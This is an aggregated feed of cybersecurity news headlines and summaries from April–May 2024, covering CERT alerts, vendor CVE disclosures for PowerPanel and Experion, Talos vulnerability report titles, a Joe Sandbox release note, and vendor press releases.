
This week, we talk about Android malware designed to give criminals access to victims’ bank accounts. As usual, the review also includes recently reported scams.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-182024
APT28 campaign targeting Polish government institutions
2024-05-08T11:00:00Z | 1715166000

CERT Polska is observing a malicious e-mail campaign targeting Polish government institutions conducted by the APT28 group.

https://cert.pl/en/posts/2024/05/apt28-campaign/
Security Alert (A24-05-04): Multiple Vulnerabilities in Google Chrome
2024-05-08T04:00:00Z | 1715140800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
NetNoiseCon - Recapping our Debut Event
2024-05-08T00:00:00Z | 1715126400

From incredible technical talks to insightful career advice from industry leaders, there was something for everyone. We strongly encourage you to watch each of the talks and soak in the wisdom shared by our stellar lineup of speakers.

https://www.greynoise.io/blog/netnoisecon-recapping-our-debut-event
RSAC 2024: Global InfoSec Awards Names Hillstone Networks Winner in Two Categories
2024-05-07T14:54:00Z | 1715093640

Hillstone Networks Wins “Editor’s Choice: Security Company” and “Market Leader: Network Detection and Response” in 12th Annual Global InfoSec Awards SANTA CLARA, Calif.–Hillstone Networks, a leading provider in cybersecurity solutions, is proud to announce that it has been awarded the following two Cyber Defense Magazine (CDM) awards: “We’re very excited to win these two cybersecurity awards […] The post RSAC 2024: Global InfoSec Awards Names Hillstone Networks Winner in Two Categories appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/company/press-releases/rsac-2024-global-infosec-awards-names-hillstone-networks-winner-in-two-categories/
How Effectively Are You Deploying Segmentation to Mitigate Cyberattack Risks?
2024-05-07T13:00:00Z | 1715086800

https://www.akamai.com/blog/security/2024/may/effectively-deploying-segmentation-to-mitigate-cyberattack-risks
Accelerating Zero Trust Outcomes with Generative AI, Part 2: Guardicore AI
2024-05-07T13:00:00Z | 1715086800

https://www.akamai.com/blog/security/2024/may/accelerating-zero-trust-outcomes-with-generative-ai-part-2
Cato CTRL Issues New SASE Threat Report
2024-05-07T11:34:40Z | 1715081680

Threat actors are always evolving. Whether it is nation-state actors, cybercrime groups, ransomware gangs, or niche teams targeting specific systems – new tools, techniques, and procedures are constantly introduced by attackers. Stopping those threats is challenging in large part because Cyber Threat Intelligence (CTI) remains fragmented. Telltale threat indicators are often available but spread across... The post Cato CTRL Issues New SASE Threat Report appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-ctrl-issues-new-sase-threat-report/
Q1 2024 Cato CTRL SASE Threat Report
2024-05-07T11:26:56Z | 1715081216

The post Q1 2024 Cato CTRL SASE Threat Report appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-cato-ctrl-sase-threat-report-q1-2024/
Graylog 6.0 to Deliver Effective Enterprise Threat Detection and Response
2024-05-07T11:05:19Z | 1715079919

In response to evolving cyber threats, Graylog, a leader in Threat Detection and Incident Response (TDIR), today announces the release of Graylog Security 6.0 to help enterprises combat continuous cyber threats. The updated solution provides intuitive and cost-effective threat detection and incident response capabilities designed to address today’s cybersecurity challenges without the complexity and high costs associated with traditional SIEM platforms. The post Graylog 6.0 to Deliver Effective Enterprise Threat Detection and Response appeared first on Graylog.

https://graylog.org/news/graylog-6-0-to-deliver-effective-enterprise-threat-detection-and-response/
Security Alert (A24-05-03): Multiple Vulnerabilities in Android
2024-05-07T04:00:00Z | 1715054400

Google has released Android Security Bulletin May 2024 to address multiple vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Por que Pequenos Negócios Devem Investir em Cibersegurança?
2024-05-06T22:38:13Z | 1715035093

https://nsfocusglobal.com/web-stories/por-que-pequenos-negocios-devem-investir-em-ciberseguranca/
Hillstone Networks Announces Strategic Partnership with Microlinkas Master Distributor in Malaysia
2024-05-06T16:57:44Z | 1715014664

Hillstone and Microlink provide integrated technology solutions to help enterprise achieve their business outcomes. Hillstone Networks, a leading provider of cybersecurity solutions, announces an exclusive partnership with Microlink (Microlink Solutions Berhad) in Malaysia. This strategic partnership brings together the expertise and experience of two industry leaders to deliver cutting-edge network security solutions to enterprises across […] The post Hillstone Networks Announces Strategic Partnership with Microlinkas Master Distributor in Malaysia appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/company/press-releases/hillstone-networks-announces-strategic-partnership-with-microlinkas-master-distributor-in-malaysia/
Graylog’s Strategic Wins Highlight Industry Leadership
2024-05-06T16:00:56Z | 1715011256

Graylog secures top accolades at the Global InfoSec Awards 2024, dominating in SIEM for the fourth consecutive year and making a mark in API Security. Find out what sets Graylog apart in the ever-evolving cybersecurity landscape. The post Graylog’s Strategic Wins Highlight Industry Leadership appeared first on Graylog.

https://graylog.org/news/graylogs-strategic-wins-highlight-industry-leadership/
Outshift Leads the Way with AI at RSA Conference 2024
2024-05-06T12:00:00Z | 1714996800

The latest AI-based enhancements for Panoptica will help customers build a complete Cloud Native Application Protection Platform solution.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m05/outshift-leads-the-way-with-ai-at-rsa-conference-2024.html
Accelerating Zero Trust Outcomes with Generative AI, Part 1: AI Labeling
2024-05-06T10:00:00Z | 1714989600

https://www.akamai.com/blog/security/2024/may/accelerating-zero-trust-outcomes-with-generative-ai-part-1
The Platform Makes All the SASE Difference
2024-05-05T10:16:22Z | 1714904182

The post The Platform Makes All the SASE Difference appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-the-platform-makes-all-the-sase-difference
IronRadar Reforged
2024-05-03T17:36:42Z | 1714757802

Block The Assault Before It Ever Happens Cybersecurity organizations are fighting a constant battle against threats across an evolving cyber landscape while being understaffed and facing constrained budgets. This generally results in a reactive cybersecurity environment, especially for the more resource-strained entities, wherein the adversary always has the initiative. Traditional cybersecurity threat intelligence solutions require significant funding, or in-house skills, or both.

https://www.ironnet.com/blog/iron-radar-reforged
Surge of JavaScript Malware in sites with vulnerable versions of LiteSpeed Cache Plugin
2024-05-03T15:01:15Z | 1714748475

If you’ve recently encountered the admin user wpsupp‑user on your website, it means it’s being affected by this wave of infections. Identifying Contamination Signs: The malware typically injects code into critical WordPress files, often manifesting as : Or in the database, when the vulnerable version of LiteSpeed Cache is exploited : decoded version: Cleanup Procedures Identifying Malicious URLs and IPs […]

https://wpscan.com/blog/surge-of-javascript-malware-in-sites-with-vulnerable-versions-of-litespeed-cache-plugin/
Healthcare Needs To Be Laser-Focused on API Security and Its Blind Spots
2024-05-03T13:00:00Z | 1714741200

API-powered tools can enhance patient access to healthcare services, but these tools also introduce risk. Learn how to protect your organization.

https://www.akamai.com/blog/security/2024/apr/healthcare-laser-focused-api-security-blind-spots
The National Cyber Security Centre Finland’s weekly review – 17/2024
2024-05-03T12:25:46Z | 1714739146

This week, our topics include the use of .fi domain names in phishing and how to ensure information security at the workplace during the summer holiday season.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-172024
The National Cyber Security Centre Finland’s weekly review – 17/2024
2024-05-03T12:25:46Z | 1714739146

This week, our topics include the use of .fi domain names in phishing and how to ensure information security at the workplace during the summer holiday season.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-172024
Security Alert (A24-05-02): Multiple Vulnerabilities in Microsoft Edge
2024-05-03T04:00:00Z | 1714708800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Noname Security Platform Updates: 3.30 Release
2024-05-02T18:01:00Z | 1714672860

https://www.akamai.com/blog/security/2024/sep/noname-security-platform-updates-330-release
CVE-2024-34025
2024-05-02T16:53:00Z | 1714668780

CWE-259: USE OF HARD-CODED PASSWORD The application code contains a hard-coded set of authentication credentials. This could result in an attacker bypassing authentication and gaining administrator privileges. Successful exploitation of these vulnerabilities could result in an attacker bypassing authentication and gaining administrator privileges, forging JWT tokens to bypass authentication, writing arbitrary files to the server and achieving code execution, gaining access to services with the privileges of a PowerPanel application, gaining access to the testing or production server, learning passwords and authenticating with user or administrator privileges, injecting SQL syntax, writing arbitrary files to the system, executing remote code, impersonating any client in the system and sending malicious data, or obtaining data from throughout the system after gaining access to any device.

https://claroty.com/team82/disclosure-dashboard/cve-2024-34025
CVE-2024-33615
2024-05-02T16:53:00Z | 1714668780

CWE-23: RELATIVE PATH TRAVERSAL A specially crafted Zip file containing path traversal characters can be imported to the server, which allows file writing to the server outside the intended scope, and could allow an attacker to achieve remote code execution. Successful exploitation of these vulnerabilities could result in an attacker bypassing authentication and gaining administrator privileges, forging JWT tokens to bypass authentication, writing arbitrary files to the server and achieving code execution, gaining access to services with the privileges of a PowerPanel application, gaining access to the testing or production server, learning passwords and authenticating with user or administrator privileges, injecting SQL syntax, writing arbitrary files to the system, executing remote code, impersonating any client in the system and sending malicious data, or obtaining data from throughout the system after gaining access to any device.

https://claroty.com/team82/disclosure-dashboard/cve-2024-33615
CVE-2024-32053
2024-05-02T16:53:00Z | 1714668780

CWE-798: USE OF HARD-CODED CREDENTIALS Hard-coded credentials are used by the platform to authenticate to the database, other services, and the cloud. This could result in an attacker gaining access to services with the privileges of a Powerpanel application. Successful exploitation of these vulnerabilities could result in an attacker bypassing authentication and gaining administrator privileges, forging JWT tokens to bypass authentication, writing arbitrary files to the server and achieving code execution, gaining access to services with the privileges of a PowerPanel application, gaining access to the testing or production server, learning passwords and authenticating with user or administrator privileges, injecting SQL syntax, writing arbitrary files to the system, executing remote code, impersonating any client in the system and sending malicious data, or obtaining data from throughout the system after gaining access to any device.

https://claroty.com/team82/disclosure-dashboard/cve-2024-32053
CVE-2024-32047
2024-05-02T16:53:00Z | 1714668780

CWE-489: ACTIVE DEBUG CODE Hard-coded credentials for the test server can be found in the production code. This might result in an attacker gaining access to the testing or production server. Successful exploitation of these vulnerabilities could result in an attacker bypassing authentication and gaining administrator privileges, forging JWT tokens to bypass authentication, writing arbitrary files to the server and achieving code execution, gaining access to services with the privileges of a PowerPanel application, gaining access to the testing or production server, learning passwords and authenticating with user or administrator privileges, injecting SQL syntax, writing arbitrary files to the system, executing remote code, impersonating any client in the system and sending malicious data, or obtaining data from throughout the system after gaining access to any device.

https://claroty.com/team82/disclosure-dashboard/cve-2024-32047
CVE-2024-32042
2024-05-02T16:53:00Z | 1714668780

CWE-257: STORING PASSWORDS IN A RECOVERABLE FORMAT The key used to encrypt passwords stored in the database can be found in the application code, allowing the passwords to be recovered. Successful exploitation of these vulnerabilities could result in an attacker bypassing authentication and gaining administrator privileges, forging JWT tokens to bypass authentication, writing arbitrary files to the server and achieving code execution, gaining access to services with the privileges of a PowerPanel application, gaining access to the testing or production server, learning passwords and authenticating with user or administrator privileges, injecting SQL syntax, writing arbitrary files to the system, executing remote code, impersonating any client in the system and sending malicious data, or obtaining data from throughout the system after gaining access to any device.

https://claroty.com/team82/disclosure-dashboard/cve-2024-32042
CVE-2024-31856
2024-05-02T16:53:00Z | 1714668780

CWE-89: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND ('SQL INJECTION') An attacker with certain MQTT permissions can create malicious messages to all Power Panel devices. This could result in an attacker injecting SQL syntax, writing arbitrary files to the system, and executing remote code. Successful exploitation of these vulnerabilities could result in an attacker bypassing authentication and gaining administrator privileges, forging JWT tokens to bypass authentication, writing arbitrary files to the server and achieving code execution, gaining access to services with the privileges of a PowerPanel application, gaining access to the testing or production server, learning passwords and authenticating with user or administrator privileges, injecting SQL syntax, writing arbitrary files to the system, executing remote code, impersonating any client in the system and sending malicious data, or obtaining data from throughout the system after gaining access to any device.

https://claroty.com/team82/disclosure-dashboard/cve-2024-31856
CVE-2024-31410
2024-05-02T16:53:00Z | 1714668780

CWE-321: USE OF HARD-CODED CRYPTOGRAPHIC KEY The devices Power Panel manages use identical certificates based on a hard-coded cryptographic key. This can allow an attacker to impersonate any client in the system and send malicious data. Successful exploitation of these vulnerabilities could result in an attacker bypassing authentication and gaining administrator privileges, forging JWT tokens to bypass authentication, writing arbitrary files to the server and achieving code execution, gaining access to services with the privileges of a PowerPanel application, gaining access to the testing or production server, learning passwords and authenticating with user or administrator privileges, injecting SQL syntax, writing arbitrary files to the system, executing remote code, impersonating any client in the system and sending malicious data, or obtaining data from throughout the system after gaining access to any device.

https://claroty.com/team82/disclosure-dashboard/cve-2024-31410
CVE-2024-31409
2024-05-02T16:53:00Z | 1714668780

CWE-285: IMPROPER AUTHORIZATION Certain MQTT wildcards are not blocked on the system, which might result in an attacker obtaining data from throughout the system after gaining access to any device. Successful exploitation of these vulnerabilities could result in an attacker bypassing authentication and gaining administrator privileges, forging JWT tokens to bypass authentication, writing arbitrary files to the server and achieving code execution, gaining access to services with the privileges of a PowerPanel application, gaining access to the testing or production server, learning passwords and authenticating with user or administrator privileges, injecting SQL syntax, writing arbitrary files to the system, executing remote code, impersonating any client in the system and sending malicious data, or obtaining data from throughout the system after gaining access to any device.

https://claroty.com/team82/disclosure-dashboard/cve-2024-31409
8 Reasons Why Your IT Organization Needs SASE
2024-05-02T13:09:27Z | 1714655367

The post 8 Reasons Why Your IT Organization Needs SASE appeared first on Cato Networks.

https://www.catonetworks.com/resources/8-reasons-why-your-it-organization-needs-sase/
The life and times of an Abstract Syntax Tree
2024-05-02T13:00:06Z | 1714654806

You’ve reached computer programming nirvana. Your journey has led you down many paths, including believing that God wrote the universe in LISP, but now the truth is clear in your mind: every problem can be solved by writing one more compiler. It’s true. Even our soon-to-be artificially intelligent overlords are nothing but […]

https://blog.trailofbits.com/2024/05/02/the-life-and-times-of-an-abstract-syntax-tree/
Using Our Environmental Management System to Create a Sustainable Future
2024-05-02T13:00:00Z | 1714654800

https://www.akamai.com/blog/sustainability/2024/may/environmental-management-system-to-create-a-sustainable-future
Vulnerability in CraftBeerPi 4 software
2024-05-02T11:00:00Z | 1714647600

Improper Input Validation vulnerability (CVE-2024-3955) has been found in PiBrewing CraftBeerPi 4 software.

https://cert.pl/en/posts/2024/05/CVE-2024-3955/
CVE-2024-33625
2024-05-02T10:50:00Z | 1714647000

CWE-259: USE OF HARD-CODED PASSWORD The application code contains a hard-coded JWT signing key. This could result in an attacker forging JWT tokens to bypass authentication. Successful exploitation of these vulnerabilities could result in an attacker bypassing authentication and gaining administrator privileges, forging JWT tokens to bypass authentication, writing arbitrary files to the server and achieving code execution, gaining access to services with the privileges of a PowerPanel application, gaining access to the testing or production server, learning passwords and authenticating with user or administrator privileges, injecting SQL syntax, writing arbitrary files to the system, executing remote code, impersonating any client in the system and sending malicious data, or obtaining data from throughout the system after gaining access to any device.

https://claroty.com/team82/disclosure-dashboard/cve-2024-33625
Security Alert (A24-05-01): Multiple Vulnerabilities in Google Chrome
2024-05-02T04:00:00Z | 1714622400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
2024 Verizon DBIR: Surviving the Year of the Vuln
2024-05-02T00:00:00Z | 1714608000

Go inside the 2024 Verizon Data Breach Investigations Report (DBIR) to discover key takeaways and insights as GreyNoise analyzes the rise of vulnerability exploitation in cyber attacks.

https://www.greynoise.io/blog/2024-verizon-dbir-surviving-the-year-of-the-vuln
The Crucial Role of Data in Sustainability
2024-05-01T13:00:00Z | 1714568400

Akamai?s data has the potential to help us address one of the most significant challenges of our time: climate change.

https://www.akamai.com/blog/sustainability/2024/apr/crucial-role-data-sustainability
stb stb_vorbis.c comment heap-based buffer overflow vulnerability
2024-05-01T00:00:00Z | 1714521600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1846
Tinyproxy HTTP Connection Headers use-after-free vulnerability
2024-05-01T00:00:00Z | 1714521600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1889
Milesight UR32L luci2-io file-import firmware update vulnerability
2024-05-01T00:00:00Z | 1714521600

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1852
Redefining Cyber Threat Detection with AI by Mark Wojtasiak
2024-05-01T00:00:00Z | 1714521600

Ed Amoroso, founder and CEO of TAG Infosphere Interviews Mark Wojtasiak, VP of Product at Vectra AI where they discuss how the right approach to AI can stop today’s hybrid attacks.

https://www.vectra.ai/blog/redefining-cyber-threat-detection-with-ai
GMS ECM multiple vulnerabilities
2024-04-30T19:20:55Z | 1714504855

SonicWall GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions are vulnerable to the following security issues.1) CVE-2024-29010 - GMS ECM Policy XML External Entity Processing Information Disclosure Vulnerability.The XML document processed in the GMS ECM endpoint is vulnerable to XML external entity (XXE) injection vulnerability leading to information disclosure.CVSS Score: 7.1CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:NCWE-611: Improper Restriction of XML External Entity Reference2) CVE-2024-29011 - GMS ECM Hard-Coded Credential Authentication Bypass Vulnerability.Use of hard-coded password in the GMS ECM endpoint leading to authentication bypass vulnerability.CVSS Score: 7.5CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:NCWE-259: Use of Hard-coded Password While it is crucial to highlight that SonicWall Analytics products remain unaffected by these vulnerabilities. Additionally, there is no substantiated evidence to suggest that these vulnerabilities are currently being actively exploited in real-world scenarios.SonicWall strongly recommends that organizations running older versions of GMS builds upgrade to newer fixed versions. CVE: CVE-2024-29010, CVE-2024-29011 Last updated: April 30, 2024, 7:20 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0007
Joe Sandbox v40 Tourmaline
2024-04-30T13:44:00Z | 1714484640

Today, we are proud to release Joe Sandbox 40 under the code name Tourmaline! This release is packed with many new detection signatures and important features to make Joe Sandbox even better.Our Joe Sandbox Cloud Pro, Basic, and OEM servers have recently been upgraded to Tourmaline.If you wish to upgrade your on-premise Joe Sandbox installation right away, please read the Update Guide that you received via our e-mailing list. You can also find the Update Guide in our customer portal. 186 new SignaturesTourmaline comes with a large number of new Yara and Behavior signatures to detect new malware families like UPSTYLE, Latrodectus, TutorialRAT, ClipWallet, CleanUp Loader, AcidPour, Meethub, Xdealer, Zardoor and many more. In addition, we added 8 new Malware Configuration Extractors, e.g. Pikabot, GCleaner, Latrodectus, Nightingale Stealer, AltraClipper, to name a few:Direct / Indirect System Call DetectionMalware samples have the option to call a Windows API, but also more difficult path, to directly call functionality in the kernel via system calls. The later case is used by malware to bypass AV and EDR. With Tourmaline we added detections for this defense evasion:Usually the executed direct / indirect system calls are related to process and memory injection behavior since these behaviors are well covered by EDR and AV solutions.PyInstaller DecompilationPython allows fast prototyping and with PyInstaller, Python runs on Windows without any Python preinstalls. Hence PyInstaller has become very popular for stealers. With Joe Sandbox v40 we added automated unpacking and decompilation of PyInstaller based samplesThe decompiled code can be downloaded from the analysis detail page. Here is a function which steals the cookie and logins from Chrome & Edge:Support for Ubuntu 22With Tourmaline cyber security analysts can detonate Linux samples on Ubuntu 16, Ubuntu 20 and now also Ubuntu 22. A good example is Dinodas RAT:Full analysis report with report tour.Download and Execute Option for LinuxURLs pointing to a bash script are very common in Linux world. Attacks usually start with such a link. Joe Sandbox v40 provides a convenient way of submitting such links:Final WordsIn this blog post, we have presented the most important features of Joe Sandbox Tourmaline, but there are some other interesting features on top:Added support to analyze MSIX file (installer clicking)Added simple dylib loading (for Big Sur onwards)Added symbol meta data in Mach-O static parsingImproved selection of most interesting screenshotsImproved Yara rule validationImproved malformed DNS detectionImproved Firefox browsing performanceImproved prevention of various VM detections (boot count, secure boot etc)Improved sleep handling for ELF binaries written in GoImproved memory dumping on Apple Silicon (ARM64)Improved detection on in-memory-only code execution on macOSImproved Mach-O static file parsingWould you like to try Joe Sandbox? Register for a free account on Joe Sandbox Cloud Basic or contact us for an in-depth technical demo!

https://www.joesecurity.org/blog/3643026438499780875
Curvance: Invariants unleashed
2024-04-30T13:30:43Z | 1714483843

Welcome to our deep dive into the world of invariant development with Curvance. We’ve been building invariants as part of regular code review assessments for more than 6 years now, but our work with Curvance marks our very first official invariant development project, in which developing and testing invariants is all we […]

https://blog.trailofbits.com/2024/04/30/curvance-invariants-unleashed/
The Era of Microperimeters
2024-04-30T13:00:00Z | 1714482000

Paradigm Shift to Zero Trust Networking

https://blogs.arista.com/blog/the-era-of-microperimeters
5 Steps to Make Zero Trust Achievable
2024-04-30T10:00:00Z | 1714471200

https://www.akamai.com/blog/security/2024/apr/5-steps-to-make-zero-trust-achievable
Foxit Reader Lock object fields property type confusion vulnerability
2024-04-30T00:00:00Z | 1714435200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1963
Foxit Reader Barcode widget Calculate event use-after-free vulnerability
2024-04-30T00:00:00Z | 1714435200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1958
Foxit Reader ComboBox widget Format event use-after-free vulnerability
2024-04-30T00:00:00Z | 1714435200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1959
What We're Reading: April 2024
2024-04-30T00:00:00Z | 1714435200

Welcome to our Monthly Roundup, where we curate a unique mix of articles, books, podcasts, and more that have captured the attention of the GreyNoise team. From deeply technical articles to literary treasures, join us on this eclectic journey through the media that sparks our curiosity each month. Explore + discover as we share the gems that have fueled our inspiration!

https://www.greynoise.io/blog/what-were-reading-april-2024
Riiklik postkast uuenes
2024-04-29T05:37:05Z | 1714369025

Neljapäeval, 25. aprillil jõudis kasutajateni täiesti uus riiklik postkast, kus muudeti lisaks visuaalsetele uuendustele oluliselt kogu riikliku postkasti toimimisloogikat ja taustsüsteeme. Uuendusega tagatakse sujuvam postkasti toimimine, mis võimaldab edaspidi teha uusi olulisi tehnoloogilisi hüppeid.

https://ria.ee/uudised/riiklik-postkast-uuenes
Security Alert (A24-04-19): Multiple Vulnerabilities in Microsoft Edge
2024-04-29T04:00:00Z | 1714363200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-04-20): Multiple Vulnerabilities in QNAP Products
2024-04-29T04:00:00Z | 1714363200

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
Publicado Boletim n.º 1/2024 do Observatório de Cibersegurança
2024-04-29T00:00:00Z | 1714348800

O primeiro Boletim de 2024 aborda o problema dos infostealers, explicando o que são, como podem colocar a segurança em causa e como mitigar os perigos que representam. Os infostealers são códigos maliciosos desenvolvidos para recolher dados sensíveis de um sistema. Apesar de não serem uma ameaça nova, o seu ressurgimento e os riscos graves que colocam tornam este tema particularmente oportuno. Como é habitual, o Boletim partilha notícias e documentos considerados de interesse. Consulte o documento aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135860/publicado-boletim-n-12024-do-observatorio-de-ciberseguranca
Learning from XZ Utils: For the Modern Enterprise, Unknown Risks are Here to Stay by Tim Wade
2024-04-29T00:00:00Z | 1714348800

With the dust of XZ Utils backdoor in our rearview, what can enterprise SOCs learn for future security risk management? According to one CTO, it’s a lot.

https://www.vectra.ai/blog/xz-utils-lessons-for-enterprise-security-risk-management
RIA läbis edukalt Eesti infoturbestandardi põhiauditi
2024-04-26T13:14:09Z | 1714137249

Aprillis sai riigi infosüsteemi amet (RIA) audiitorilt Eesti infoturbestandardi ehk E-ITSi rakendamise auditi järeldusotsuse. Selles kinnitatakse, et ameti eesmärk oma tegevusi kaitsta on valitud infoturbe meetmetega saavutatav.

https://ria.ee/uudised/ria-labis-edukalt-eesti-infoturbestandardi-pohiauditi
Announcing two new LMS libraries
2024-04-26T13:00:32Z | 1714136432

The Trail of Bits cryptography team is pleased to announce the open-sourcing of our pure Rust and Go implementations of Leighton-Micali Hash-Based Signatures (LMS), a well-studied NIST-standardized post-quantum digital signature algorithm. If you or your organization are looking to transition to post-quantum support for digital signatures, both of these implementations have been […]

https://blog.trailofbits.com/2024/04/26/announcing-two-new-lms-libraries/
Think Beyond the Perimeter: Secure Your APIs with East-West Visibility
2024-04-26T13:00:00Z | 1714136400

https://www.akamai.com/blog/security/2024/apr/secure-your-apis-with-east-west-visibility
CVE-2023-5390
2024-04-25T16:16:00Z | 1714061760

CWE-36: Absolute Path Traversal Successful exploitation of this vulnerability could allow an attacker to read from the Experion controllers or SMSC S300. This exploit could be used to read files from the controller that may expose limited information from the device.

https://claroty.com/team82/disclosure-dashboard/cve-2023-5390
CVE-2023-5389
2024-04-25T16:15:00Z | 1714061700

CWE-749: Exposed Dangerous Method or Function Successful exploitation of this vulnerability could allow an attacker to modify files on Experion controllers or SMSC S300. This exploit could be used to write a file that may result in unexpected behavior based on configuration changes or updating of files that could result in subsequent execution of a malicious application if triggered.

https://claroty.com/team82/disclosure-dashboard/cve-2023-5389
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
2024-04-25T14:00:00Z | 1714053600

https://www.akamai.com/blog/security-research/2024/apr/phishing-usps-malicious-domains-traffic-equal-to-legitimate-traffic
Kodutütred kogunesid Virumaale küberturbe linnalaagrisse
2024-04-25T12:36:13Z | 1714048573

Kevadisel koolivaheajal kogunesid Alutaguse, Järva, Jõgeva ja Viru ringkonna kodutütred Kaitseliidu Viru maleva ruumidesse Rakverre, et uurida, millega tegelevad küberturbe eksperdid, mis on eetiline häkkimine ning millised küberohud võivad ähvardada võrke, arvuteid ja nutiseadmeid.

https://ria.ee/uudised/kodututred-kogunesid-virumaale-kuberturbe-linnalaagrisse
2024 Q2 Vulnerability Forecast
2024-04-25T10:30:00Z | 1714041000

So what are we expecting in terms of numbers of CVEs this quarter?

https://www.first.org/blog/20240419-Q2Vulnerability-Forecast
2024 Q2 Vulnerability Forecast
2024-04-25T10:30:00Z | 1714041000

So what are we expecting in terms of numbers of CVEs this quarter?

https://www.first.org/blog/20240419-Q2Vulnerability-Forecast
Cato CTRL: A New Vision in Extended Threat Intelligence Reporting
2024-04-25T08:13:38Z | 1714032818

Over the past twenty years, I have navigated a unique journey through the cybersecurity landscape. My path has taken me from the realms of hacking and academia into the heart of threat intelligence (TI), culminating in my current role. Since I joined Cato in 2021, I’ve been leading security strategy and am proud to share... The post Cato CTRL: A New Vision in Extended Threat Intelligence Reporting appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-ctrl-a-new-vision-in-extended-threat-intelligence-reporting/
Security Alert (A24-04-17): Multiple Vulnerabilities in Google Chrome
2024-04-25T04:00:00Z | 1714017600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A24-04-18): Multiple Vulnerabilities in Cisco Products
2024-04-25T04:00:00Z | 1714017600

Cisco released security advisories to address multiple vulnerabilities in Cisco products.

https://www.govcert.gov.hk/en/alerts_detail.php
Grassroot DICOM LookupTable::SetLUT out-of-bounds write vulnerability
2024-04-25T00:00:00Z | 1714003200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1924
Grassroot DICOM RAWCodec::DecodeBytes out-of-bounds read vulnerability
2024-04-25T00:00:00Z | 1714003200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1944
Grassroot DICOM JPEG2000Codec::DecodeByStreamsCommon out-of-bounds write vulnerability
2024-04-25T00:00:00Z | 1714003200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1935
New Malware Campaign Targets WP-Automatic Plugin
2024-04-24T19:27:44Z | 1713986864

A few weeks ago a critical vulnerability was discovered in the plugin WP‑Automatic. This vulnerability, a SQL injection (SQLi) flaw, poses a severe threat as attackers can exploit it to gain unauthorized access to websites, create admin‑level user accounts, upload malicious files, and potentially take full control of affected sites. The Vulnerability The vulnerability lies in […]

https://wpscan.com/blog/new-malware-campaign-targets-wp-automatic-plugin/
Report: The 2024 State of Ransomware
2024-04-24T12:39:40Z | 1713962380

Through extensive research, RiskRecon has cataloged and analyzed over 1,454 destructive ransomware events to distill crucial patterns and insights. Our study identifies periods of increased risk when breach frequencies spike dramatically.

https://blog.riskrecon.com/resources/reports-and-whitepapers/report-state-of-ransomware-2024
Cisco news in 60 seconds: security in the era of AI
2024-04-24T12:00:00Z | 1713960000

Catch up on Cisco’s latest security news, including the launch of the groundbreaking Cisco Hypershield. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m04/cisco-news-in-60-seconds-security-in-the-era-of-ai.html
Security Advisory - Connection Hijacking Vulnerability in Some Huawei Home Routers
2024-04-24T00:00:00Z | 1713916800

//www.huawei.com/en/psirt/security-advisories/2024/huawei-sa-chvishhr-d50dedde-en
Exploring GreyNoise: The User-Centric Design Approach in Cybersecurity
2024-04-24T00:00:00Z | 1713916800

Discover how GreyNoise seamlessly integrates robust security with intuitive design, empowering users with user-centric solutions. From clutter-free interfaces to inclusive design philosophy, explore how our commitment to simplicity and accessibility transforms cybersecurity.

https://www.greynoise.io/blog/exploring-greynoise-the-user-centric-design-approach-in-cybersecurity
How HTTP/2 Persistent Connections Help Improve Performance and User Experience
2024-04-23T13:00:00Z | 1713877200

https://www.akamai.com/blog/performance/2024/apr/http2-persistent-connections
Wi-Fi 7: The Future of High Speed Wireless Networking is Here
2024-04-23T13:00:00Z | 1713877200

Enterprises are under pressure to meet and exceed the challenges of rapidly increasing bandwidth requirements, including AR/VR (augmented reality/virtual reality) applications, streaming multimedia, IoT proliferation, video applications and high density deployments.

https://blogs.arista.com/blog/wifi-7
The National Cyber Security Centre Finland’s weekly review – 16/2024
2024-04-23T10:36:28Z | 1713868588

This week, we talk about the critical vulnerability discovered in Palo Alto network devices and the yellow alert issued about it. Other topics this week include phishing messages sent out in the Positive credit register’s name and invoice fraud attempts targeting various organisations.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-162024
The National Cyber Security Centre Finland’s weekly review – 16/2024
2024-04-23T10:36:28Z | 1713868588

